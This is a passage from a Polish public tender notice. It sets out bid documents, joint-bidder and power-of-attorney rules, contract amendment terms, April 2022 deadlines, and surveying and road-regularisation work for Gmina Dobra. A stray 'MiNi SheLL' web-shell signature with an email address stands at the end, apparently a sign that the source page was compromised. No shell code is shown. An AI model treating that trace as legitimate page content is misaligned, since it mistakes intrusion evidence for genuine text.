Wykaz przedmiotowych środków dowodowych: </h3> Wykaz osób składany w celu oceny oferty z zastosowaniem kryterium – doświadczenie osób wyznaczonych do realizacji zamówienia (załącznik nr 3 do SWZ) – dokument związany z zastosowanym kryterium, składane wraz z ofertą. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy (załącznik nr 1 do SWZ)<br/>Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku, wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego opisem lub normami. Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8 SWZ.<br/>Oświadczenie składają odrębnie:<br/>- wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy;<br/>Pełnomocnictwo<br/>• Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>• W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>• Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Zobowiązanie podmiotu trzeciego<br/>Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>• Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>• Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień niniejszej umowy:<br/>a)	termin realizacji zamówienia, o czas niezbędny do realizacji zamówienia obliczony przez Wykonawcę, lecz nie przekraczający daty 20.12.2022 r., w przypadku uzasadnionych okoliczności nie wynikających z winy Wykonawcy lub Zamawiającego tj. np.:<br/>•	w przypadku zagrożenia płynności finansowej Zamawiającego. W takiej sytuacji Zamawiający wydłuży czas realizacji umowy o niezbędny okres czasu,<br/>•	w przypadku wystąpienia czynników zewnętrznych (dostępności podzespołów itp. na rynku itp.) niezależnych od Zamawiającego i Wykonawcy, które nie pozwolą na terminowe wykonanie zamówienia,<br/>•	w przypadku wystąpienia siły wyższej, klęsk żywiołowych, które miały wpływ na wykonanie w terminie przedmiotu umowy, o okres zaistniałej przerwy uniemożliwiającej dostawę przedmiotu umowy.<br/>b)	adres siedziby Wykonawcy, nr konta bankowego na który ma być dokonany przelew za realizację zamówienia. Wskazane zmiany mogą nastąpić w przypadku zmian organizacyjnych Wykonawcy lub innych zmian o podłożu finansowym. Niedopuszczalna jest zmiana strony umowy, tj. Wykonawcy wybranego w drodze postępowania przetargowego,<br/>c)	stawkę podatku VAT w przypadku zmiany przepisów dotyczących jego wysokości. W takim przypadku o nową stawkę podatku VAT zostanie skorygowane wynagrodzenie Wykonawcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-01 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa uprzednio podpisaną podpisem elektronicznym ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/ oraz załączonej do niniejszej SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-01 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy opisu przedmiotu zamówienia dla części nr 4<br/><br/>4.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego drogi gminnej „Skrzydlna-Rynek”, Skrzydlna-Przenosza”, „Skrzydlna-Kasina Wielka” <br/>w miejscowości Wola Skrzydlańska, Skrzydlna, Przenosza oraz drogi „droga Półrzeczki” w miejscowości Półrzeczki i Jurków.<br/>Na w/w dokumentację składać się będzie:<br/><br/>a)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewidencyjnych nr:<br/>- 3156 - obręb Jurków<br/>- 927, 1050, 1052, 1822 - obręb Półrzeczki<br/>- 109, 102, 84 - obręb Wola Skrzydlańska.<br/>- 442/1, 442/2, 406/1, 406/2, 395/1, 390, 391, 395/1, 307 – obręb Skrzydlna<br/>- 529 - obręb Przenosza <br/>W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków <br/>z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Mapy do celów prawnych należy wykonać bez ustalenia granic. Dokumentacja będzie służyła w przeważającej części do regulacji stanu prawnego dróg w na podstawie przepisów ustawy „Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.” tzw. komunalizacja). Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>Wykaz synchronizacyjny z 1990 r. do działki 406 i 395 w Skrzydlnej z stanowi załącznik nr 13. Mapy katastralne pozyskane z internetowego archiwum narodowego stanowią załączniki nr 14,15,16,17,18,19.<br/><br/><br/>b)	dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę i przekazana Zamawiającemu w ilości:<br/>-mapa do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi - w ilości egz. równej ilości wydzielonych ciał hipotecznych<br/>+3 dodatkowe egz.<br/> - operat pomiarowy w postaci elektronicznej<br/><br/>5.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego drogi wewnętrznej stanowiącej działkę ewid. nr 192 w Woli Skrzydlańskiej.<br/><br/>Na w/w dokumentację składać się będzie:<br/>a)	Ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. w sprawie ewidencji gruntów i budynków działki nr 192 w Woli Skrzydlańskiej ze wszystkimi działkami sąsiednimi. W przypadku stwierdzenia, że istniejąca w terenie droga zajmuje nieruchomość sąsiednią należy wykonać projekt podziału nieruchomości w trybie ustawy o gospodarce nieruchomościami /tj. Dz. U. z 2020 r. poz. 256 ze zmianami/ na poszerzenie drogi zgodnie z jej istniejącym stanem na gruncie. Podziały będą wykonywane na wniosek właścicieli nieruchomości. Granice ustalone na podstawie zgodnego oświadczenia stron oraz nowe granice podziałowe należy zastabilizować granicznikami betonowymi lub plastikowymi typu plastmark. <br/>b)	Sporządzenie mapy do celów prawnych wraz z wykazami synchronizacyjnymi do zasiedzenia nieruchomości stanowiącej działkę ewid. nr 192 w Woli Skrzydlańskiej, która będzie służyła do zasiedzenia tej drogi przez Gminę Dobra.<br/><br/>c)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę i przekazana Zamawiającemu w ilości:<br/><br/>- mapy do celów prawnych ( do zasiedzenia)- 4 egz. <br/>- mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości znajdujących się przy drodze–w ilości dzielonych działek+3 dodatkowe egz.<br/>- załączniki do wstępnego projektu podziału dzielonych nieruchomości-po 1 egz. dla każdej nieruchomości<br/>- operat pomiarowy w wersji elektronicznej

Creat By MiNi SheLL
Email: jattceo@gmail.com